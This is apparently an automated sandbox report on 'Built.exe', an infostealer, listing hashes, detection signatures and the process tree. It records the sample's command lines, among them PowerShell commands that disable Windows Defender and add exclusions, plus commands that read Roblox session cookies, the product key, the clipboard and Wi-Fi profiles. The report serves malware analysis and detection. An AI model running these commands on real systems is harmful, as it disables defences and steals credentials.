Analysis
max time kernel: 90s
max time network: 94s
platform: windows11-21h2_x64
resource: win11-20240611-fr
resource tags: arch:x64 arch:x86 image:win11-20240611-fr locale:fr-fr os:windows11-21h2-x64 system windows
submitted: 26-06-2024 13:10
Behavioral tasks
behavioral1: sample Built.exe, resource win10-20240611-fr
behavioral2: sample Built.exe, resource win10v2004-20240611-fr
behavioral3: sample Built.exe, resource win11-20240611-fr
General
Target: Built.exe
Size: 224.0MB
MD5: f3c0061c28b07f1ccada3dca9755b304
SHA1: dd41b3edb8abf9a0147695b7dd7f285f8d5aef1e
SHA256: 77e67941a20d70449b0a5ba735a279f1d81429d9ea08181591cf910f69b04b71
SHA512: 1e804d2a9e5cac5c65ee93b0c30f36916f928e8e17aa339e5db7778725bcc42ba4318f28d30eca15bc8671eea6289602e92ccd9a45b6f4f86f8d05b9e56a5707
SSDEEP: 196608:HJq+sxft1urErvI9pWjgU1DEzx7sKLus1tPAkjUWlRHK0:0Xxft1urEUWjhEhnx1tl9K0
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 3 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  Processes (pid, process):
    484   powershell.exe
    1276  powershell.exe
    1980  powershell.exe
- Drops file in Drivers directory (3 IoCs)
  Processes (description, ioc, process):
    File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
    File opened for modification  C:\Windows\System32\drivers\etc\hosts  Built.exe
    File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
- Executes dropped EXE (1 IoCs)
  Processes (pid, process):
    4948  rar.exe
- Loads dropped DLL (17 IoCs)
  Processes (pid, process):
    4392  Built.exe  (17 entries, all for the same process)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
  Processes (resource, yara_rule):
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\python312.dll  upx
    behavioral3/memory/4392-24-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_ctypes.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\libffi-8.dll  upx
    behavioral3/memory/4392-30-0x00007FFADB510000-0x00007FFADB535000-memory.dmp  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_ssl.pyd  upx
    behavioral3/memory/4392-48-0x00007FFAE2D40000-0x00007FFAE2D4F000-memory.dmp  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_sqlite3.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_socket.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_queue.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_lzma.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_hashlib.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_decimal.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\_bz2.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\unicodedata.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\sqlite3.dll  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\select.pyd  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\libssl-3.dll  upx
    C:\Users\Admin\AppData\Local\Temp\_MEI25922\libcrypto-3.dll  upx
    behavioral3/memory/4392-54-0x00007FFADB460000-0x00007FFADB48D000-memory.dmp  upx
    behavioral3/memory/4392-57-0x00007FFADB440000-0x00007FFADB459000-memory.dmp  upx
    behavioral3/memory/4392-58-0x00007FFADB350000-0x00007FFADB374000-memory.dmp  upx
    behavioral3/memory/4392-60-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp  upx
    behavioral3/memory/4392-62-0x00007FFADB420000-0x00007FFADB439000-memory.dmp  upx
    behavioral3/memory/4392-64-0x00007FFAE0800000-0x00007FFAE080D000-memory.dmp  upx
    behavioral3/memory/4392-68-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp  upx
    behavioral3/memory/4392-67-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp  upx
    behavioral3/memory/4392-72-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp  upx
    behavioral3/memory/4392-71-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp  upx
    behavioral3/memory/4392-75-0x00007FFADB510000-0x00007FFADB535000-memory.dmp  upx
    behavioral3/memory/4392-78-0x00007FFAE06B0000-0x00007FFAE06BD000-memory.dmp  upx
    behavioral3/memory/4392-80-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp  upx
    behavioral3/memory/4392-81-0x00007FFAC8A00000-0x00007FFAC8B1B000-memory.dmp  upx
    behavioral3/memory/4392-77-0x00007FFADA6C0000-0x00007FFADA6D4000-memory.dmp  upx
    behavioral3/memory/4392-207-0x00007FFADB350000-0x00007FFADB374000-memory.dmp  upx
    behavioral3/memory/4392-314-0x00007FFADB510000-0x00007FFADB535000-memory.dmp  upx
    behavioral3/memory/4392-313-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp  upx
    behavioral3/memory/4392-323-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp  upx
    behavioral3/memory/4392-322-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp  upx
    behavioral3/memory/4392-319-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp  upx
    behavioral3/memory/4392-324-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp  upx
    behavioral3/memory/4392-347-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp  upx
    behavioral3/memory/4392-378-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp  upx
    behavioral3/memory/4392-390-0x00007FFADA6C0000-0x00007FFADA6D4000-memory.dmp  upx
    behavioral3/memory/4392-402-0x00007FFAE06B0000-0x00007FFAE06BD000-memory.dmp  upx
    behavioral3/memory/4392-401-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp  upx
    behavioral3/memory/4392-400-0x00007FFAE0800000-0x00007FFAE080D000-memory.dmp  upx
    behavioral3/memory/4392-399-0x00007FFADB420000-0x00007FFADB439000-memory.dmp  upx
    behavioral3/memory/4392-398-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp  upx
    behavioral3/memory/4392-397-0x00007FFADB350000-0x00007FFADB374000-memory.dmp  upx
    behavioral3/memory/4392-396-0x00007FFADB440000-0x00007FFADB459000-memory.dmp  upx
    behavioral3/memory/4392-395-0x00007FFADB460000-0x00007FFADB48D000-memory.dmp  upx
    behavioral3/memory/4392-394-0x00007FFAE2D40000-0x00007FFAE2D4F000-memory.dmp  upx
    behavioral3/memory/4392-392-0x00007FFAC8A00000-0x00007FFAC8B1B000-memory.dmp  upx
    behavioral3/memory/4392-389-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp  upx
    behavioral3/memory/4392-384-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp  upx
    behavioral3/memory/4392-393-0x00007FFADB510000-0x00007FFADB535000-memory.dmp  upx
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, ioc):
    1  ip-api.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Processes (description, ioc, process):
    Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
    Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
    Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
- Detects videocard installed (1 TTPs, 3 IoCs)
  Uses WMIC.exe to determine videocard installed.
  Processes (pid, process):
    3756  WMIC.exe
    3060  WMIC.exe
    2556  WMIC.exe
- Enumerates processes with tasklist (1 TTPs, 5 IoCs)
  Processes (pid, process):
    4776  tasklist.exe
    5096  tasklist.exe
    4128  tasklist.exe
    2324  tasklist.exe
    2348  tasklist.exe
- Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
- Suspicious behavior: EnumeratesProcesses (20 IoCs)
  Processes (pid, process):
    484   powershell.exe
    4156  powershell.exe
    484   powershell.exe
    4156  powershell.exe
    1276  powershell.exe
    1276  powershell.exe
    1284  powershell.exe
    1284  powershell.exe
    1980  powershell.exe
    1980  powershell.exe
    1284  powershell.exe
    1980  powershell.exe
    4876  powershell.exe
    4876  powershell.exe
    2212  powershell.exe
    2212  powershell.exe
    1528  powershell.exe
    1528  powershell.exe
    2012  powershell.exe
    2012  powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege              4156  powershell.exe
    Token: SeDebugPrivilege              484   powershell.exe
    Token: SeIncreaseQuotaPrivilege      4864  WMIC.exe
    Token: SeSecurityPrivilege           4864  WMIC.exe
    Token: SeTakeOwnershipPrivilege      4864  WMIC.exe
    Token: SeLoadDriverPrivilege         4864  WMIC.exe
    Token: SeSystemProfilePrivilege      4864  WMIC.exe
    Token: SeSystemtimePrivilege         4864  WMIC.exe
    Token: SeProfSingleProcessPrivilege  4864  WMIC.exe
    Token: SeIncBasePriorityPrivilege    4864  WMIC.exe
    Token: SeCreatePagefilePrivilege     4864  WMIC.exe
    Token: SeBackupPrivilege             4864  WMIC.exe
    Token: SeRestorePrivilege            4864  WMIC.exe
    Token: SeShutdownPrivilege           4864  WMIC.exe
    Token: SeDebugPrivilege              4864  WMIC.exe
    Token: SeSystemEnvironmentPrivilege  4864  WMIC.exe
    Token: SeRemoteShutdownPrivilege     4864  WMIC.exe
    Token: SeUndockPrivilege             4864  WMIC.exe
    Token: SeManageVolumePrivilege       4864  WMIC.exe
    Token: 33                            4864  WMIC.exe
    Token: 34                            4864  WMIC.exe
    Token: 35                            4864  WMIC.exe
    Token: 36                            4864  WMIC.exe
    Token: SeDebugPrivilege              2348  tasklist.exe
    Token: SeIncreaseQuotaPrivilege      4864  WMIC.exe
    Token: SeSecurityPrivilege           4864  WMIC.exe
    Token: SeTakeOwnershipPrivilege      4864  WMIC.exe
    Token: SeLoadDriverPrivilege         4864  WMIC.exe
    Token: SeSystemProfilePrivilege      4864  WMIC.exe
    Token: SeSystemtimePrivilege         4864  WMIC.exe
    Token: SeProfSingleProcessPrivilege  4864  WMIC.exe
    Token: SeIncBasePriorityPrivilege    4864  WMIC.exe
    Token: SeCreatePagefilePrivilege     4864  WMIC.exe
    Token: SeBackupPrivilege             4864  WMIC.exe
    Token: SeRestorePrivilege            4864  WMIC.exe
    Token: SeShutdownPrivilege           4864  WMIC.exe
    Token: SeDebugPrivilege              4864  WMIC.exe
    Token: SeSystemEnvironmentPrivilege  4864  WMIC.exe
    Token: SeRemoteShutdownPrivilege     4864  WMIC.exe
    Token: SeUndockPrivilege             4864  WMIC.exe
    Token: SeManageVolumePrivilege       4864  WMIC.exe
    Token: 33                            4864  WMIC.exe
    Token: 34                            4864  WMIC.exe
    Token: 35                            4864  WMIC.exe
    Token: 36                            4864  WMIC.exe
    Token: SeIncreaseQuotaPrivilege      3756  WMIC.exe
    Token: SeSecurityPrivilege           3756  WMIC.exe
    Token: SeTakeOwnershipPrivilege      3756  WMIC.exe
    Token: SeLoadDriverPrivilege         3756  WMIC.exe
    Token: SeSystemProfilePrivilege      3756  WMIC.exe
    Token: SeSystemtimePrivilege         3756  WMIC.exe
    Token: SeProfSingleProcessPrivilege  3756  WMIC.exe
    Token: SeIncBasePriorityPrivilege    3756  WMIC.exe
    Token: SeCreatePagefilePrivilege     3756  WMIC.exe
    Token: SeBackupPrivilege             3756  WMIC.exe
    Token: SeRestorePrivilege            3756  WMIC.exe
    Token: SeShutdownPrivilege           3756  WMIC.exe
    Token: SeDebugPrivilege              3756  WMIC.exe
    Token: SeSystemEnvironmentPrivilege  3756  WMIC.exe
    Token: SeRemoteShutdownPrivilege     3756  WMIC.exe
    Token: SeUndockPrivilege             3756  WMIC.exe
    Token: SeManageVolumePrivilege       3756  WMIC.exe
    Token: 33                            3756  WMIC.exe
    Token: 34                            3756  WMIC.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description, pid, process, target process); each write below is recorded twice in the report, giving 64 entries:
    PID 2592 wrote to memory of 4392  2592  Built.exe  Built.exe
    PID 4392 wrote to memory of 712   4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 4840  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 3632  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 3096  4392  Built.exe  cmd.exe
    PID 4840 wrote to memory of 4156  4840  cmd.exe    powershell.exe
    PID 712 wrote to memory of 484    712   cmd.exe    powershell.exe
    PID 3096 wrote to memory of 4864  3096  cmd.exe    WMIC.exe
    PID 3632 wrote to memory of 2348  3632  cmd.exe    tasklist.exe
    PID 4392 wrote to memory of 5104  4392  Built.exe  cmd.exe
    PID 5104 wrote to memory of 3528  5104  cmd.exe    reg.exe
    PID 4392 wrote to memory of 3668  4392  Built.exe  cmd.exe
    PID 3668 wrote to memory of 3560  3668  cmd.exe    reg.exe
    PID 4392 wrote to memory of 3064  4392  Built.exe  cmd.exe
    PID 3064 wrote to memory of 3756  3064  cmd.exe    WMIC.exe
    PID 4392 wrote to memory of 464   4392  Built.exe  cmd.exe
    PID 464 wrote to memory of 3060   464   cmd.exe    WMIC.exe
    PID 4392 wrote to memory of 5060  4392  Built.exe  cmd.exe
    PID 5060 wrote to memory of 1276  5060  cmd.exe    powershell.exe
    PID 4392 wrote to memory of 3924  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 2140  4392  Built.exe  cmd.exe
    PID 2140 wrote to memory of 4776  2140  cmd.exe    tasklist.exe
    PID 3924 wrote to memory of 5096  3924  cmd.exe    tasklist.exe
    PID 4392 wrote to memory of 1140  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 4084  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 3532  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 4548  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 2912  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 2288  4392  Built.exe  cmd.exe
    PID 1140 wrote to memory of 1316  1140  cmd.exe    Conhost.exe
    PID 4392 wrote to memory of 2692  4392  Built.exe  cmd.exe
    PID 4392 wrote to memory of 2988  4392  Built.exe  cmd.exe
- Views/modifies file attributes (1 TTPs, 2 IoCs)
  Processes (pid, process):
    4532  attrib.exe
    4872  attrib.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\Built.exe  (PID 2592)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Built.exe  (PID 4392)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      - Drops file in Drivers directory
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe  (PID 712)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 484)
          cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe  (PID 4840)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4156)
          cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe  (PID 3632)
        cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\tasklist.exe  (PID 2348)
          cmdline: tasklist /FO LIST
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe  (PID 3096)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 4864)
          cmdline: wmic csproduct get uuid
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe  (PID 5104)
        cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 3528)
          cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
    [3] C:\Windows\system32\cmd.exe  (PID 3668)
        cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 3560)
          cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
    [3] C:\Windows\system32\cmd.exe  (PID 3064)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 3756)
          cmdline: wmic path win32_VideoController get name
          - Detects videocard installed
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe  (PID 464)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 3060)
          cmdline: wmic path win32_VideoController get name
          - Detects videocard installed
    [3] C:\Windows\system32\cmd.exe  (PID 5060)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1276)
          cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\cmd.exe  (PID 3924)
        cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\tasklist.exe  (PID 5096)
          cmdline: tasklist /FO LIST
          - Enumerates processes with tasklist
    [3] C:\Windows\system32\cmd.exe  (PID 2140)
        cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\tasklist.exe  (PID 4776)
          cmdline: tasklist /FO LIST
          - Enumerates processes with tasklist
    [3] C:\Windows\system32\cmd.exe  (PID 1140)
        cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1316)
          cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    [3] C:\Windows\system32\cmd.exe  (PID 4084)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1284)
          cmdline: powershell Get-Clipboard
          - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\cmd.exe  (PID 3532)
        cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      [4] C:\Windows\system32\tasklist.exe  (PID 4128)
          cmdline: tasklist /FO LIST
          - Enumerates processes with tasklist
    [3] C:\Windows\system32\cmd.exe  (PID 4548)
        cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      [4] C:\Windows\system32\tree.com  (PID 2600)
          cmdline: tree /A /F
    [3] C:\Windows\system32\cmd.exe  (PID 2912)
        cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      [4] C:\Windows\system32\netsh.exe  (PID 4996)
          cmdline: netsh wlan show profile
          - Event Triggered Execution: Netsh Helper DLL
    [3] C:\Windows\system32\cmd.exe  (PID 2288)
        cmdline: C:\Windows\system32\cmd.exe /c "systeminfo"
      [4] C:\Windows\system32\systeminfo.exe  (PID 1008)
          cmdline: systeminfo
          - Gathers system information
    [3] C:\Windows\system32\cmd.exe  (PID 2692)
        cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      [4] C:\Windows\system32\reg.exe  (PID 3904)
          cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
    [3] C:\Windows\system32\cmd.exe  (PID 2988)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1980)
          cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 4220)
            cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e1peedbv\e1peedbv.cmdline"
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 4624)
              cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86C4.tmp" "c:\Users\Admin\AppData\Local\Temp\e1peedbv\CSC658B46EF2265495EA095467527C7E5E2.TMP"
    [3] C:\Windows\system32\cmd.exe  (PID 420)
        cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      [4] C:\Windows\system32\tree.com  (PID 3940)
          cmdline: tree /A /F
    [3] C:\Windows\system32\cmd.exe  (PID 1592)
        cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      [4] C:\Windows\system32\attrib.exe  (PID 4872)
          cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts
          - Drops file in Drivers directory
          - Views/modifies file attributes
    [3] C:\Windows\system32\cmd.exe  (PID 1468)
        cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      [4] C:\Windows\system32\tree.com  (PID 4416)
          cmdline: tree /A /F
    [3] C:\Windows\system32\cmd.exe  (PID 3452)
        cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      [4] C:\Windows\system32\attrib.exe  (PID 4532)
          cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts
          - Drops file in Drivers directory
          - Views/modifies file attributes
    [3] C:\Windows\system32\cmd.exe  (PID 3244)
        cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      [4] C:\Windows\system32\tree.com  (PID 4780)
          cmdline: tree /A /F
    [3] C:\Windows\system32\cmd.exe  (PID 4792)
        cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      [4] C:\Windows\system32\tasklist.exe  (PID 2324)
          cmdline: tasklist /FO LIST
          - Enumerates processes with tasklist
    [3] C:\Windows\system32\cmd.exe  (PID 4428)
        cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      [4] C:\Windows\system32\tree.com  (PID 4864)
          cmdline: tree /A /F
    [3] C:\Windows\system32\cmd.exe  (PID 4796)
        cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      [4] C:\Windows\system32\tree.com  (PID 4248)
          cmdline: tree /A /F
    [3] C:\Windows\system32\cmd.exe  (PID 4988)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      [4] C:\Windows\System32\Conhost.exe  (PID 1316)
          cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4876)
          cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\cmd.exe  (PID 4416)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2212)
          cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\cmd.exe  (PID 404)
        cmdline: C:\Windows\system32\cmd.exe /c "getmac"
      [4] C:\Windows\system32\getmac.exe  (PID 4652)
          cmdline: getmac
    [3] C:\Windows\system32\cmd.exe  (PID 3932)
        cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\vVa0s.zip" *"
      [4] C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe  (PID 4948)
          cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\vVa0s.zip" *
          - Executes dropped EXE
    [3] C:\Windows\system32\cmd.exe  (PID 5004)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 4680)
          cmdline: wmic os get Caption
    [3] C:\Windows\system32\cmd.exe  (PID 2864)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 3392)
          cmdline: wmic computersystem get totalphysicalmemory
    [3] C:\Windows\system32\cmd.exe  (PID 2780)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 2104)
          cmdline: wmic csproduct get uuid
    [3] C:\Windows\system32\cmd.exe  (PID 3000)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1528)
          cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\cmd.exe  (PID 2768)
        cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 2556)
          cmdline: wmic path win32_VideoController get name
          - Detects videocard installed
    [3] C:\Windows\system32\cmd.exe  (PID 3728)
        cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2012)
          cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
          - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
